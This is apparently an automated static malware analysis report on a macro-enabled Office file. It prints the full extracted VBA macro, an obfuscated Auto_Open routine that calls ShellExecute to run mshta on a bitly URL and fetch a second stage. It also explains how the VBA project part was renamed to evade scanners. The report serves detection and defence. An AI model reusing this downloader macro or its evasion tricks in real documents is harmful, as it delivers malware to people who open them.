Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e61195d0d4b89753…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 7.7 KB
First seen: 2021-06-28
MD5: 4d58c3443bffb1aa7190282a9f7ad8bc
SHA-1: e3c381f549c03ab684f9c7fa5b78a1cfae1d8ce0
SHA-256: e61195d0d4b897536f0cc090d36140099db443b5b913894d13cd76f7abee36b6
Risk Score: 68

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a macro-enabled Office document (OOXML) whose VBA project contains an Auto_Open macro, so the code runs automatically when the document is opened with macros enabled. The macro assembles the string "mshta" from single characters, declares ShellExecute from Shell32.dll, and calls it with the "open" verb on a URL that is likewise concatenated character by character, "http://www.bitly.com/hwdinnwshdwdwqwhda", so that the URL is handed to the mshta.exe interpreter, likely to download and execute a second-stage payload. The VBA project part was renamed (ppt/asjdajdoawdoajwd.bin instead of vbaProject.bin) to evade detection, and the macro source is further obfuscated with VBA line continuations (" _") that split keywords, declarations and string concatenations across many physical lines.

Heuristics (3)

  • VBA project inside OOXML (severity: medium) OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/asjdajdoawdoajwd.bin)
  • VBA project part renamed to evade filename detection (severity: high) OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro (severity: low) OLE_VBA_AUTO
    Matched line in script (split over three physical lines by VBA line continuations):
    Sub _
    Auto_Open _
    ()

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1082 bytes
SHA-256: 817a9dbeaaa9364c93657dabbb744ed2aaffd1239c48dd68da7e4a5d2df47b0b
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Const _
SW_SHOW _
= _
1
Const _
SW_SHOWMAXIMIZED _
= _
3

Public _
Declare _
Function _
ShellExecute _
Lib _
"Shell32.dll" _
Alias _
"ShellExecuteA" _
  (ByVal _
  hwnd _
  As _
  Long _
  , _
   ByVal _
   lpOperation _
   As _
   String _
   , _
   ByVal lpFile As String _
   , _
   ByVal lpParameters As String _
   , _
   ByVal lpDirectory As String _
   , _
   ByVal nShowCmd As Long) As Long
Function koko()



koko _
= _
"m" _
+ _
"s" _
+ _
"h" _
+ _
"t" _
+ _
"a"
End _
Function
Sub _
Auto_Open _
()
  Dim _
  RetVal _
  As _
  Long
  On _
  Error _
  Resume _
  Next
  RetVal _
  = _
  ShellExecute _
  (0, "open", koko, "h" _
  + _
  "t" _
  + _
  "t" _
  + _
  "p" _
  + _
  ":" _
  + _
  "/" _
  + _
  "/" _
  + _
  "w" _
  + _
  "w" _
  + "w" + "." + "b" + "i" + "t" + "l" + "y" + "." + "c" + "o" + "m/hwdinnwshdwdwqwhda", _
                        "%public%" _
                        , _
                        SW_SHOWMinimize)
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: ppt/asjdajdoawdoajwd.bin | 14336 bytes
SHA-256: db1ca81719d617cc08b00e02cbfa5f5681ab2e2c6cb27765b86dbf9707e24e33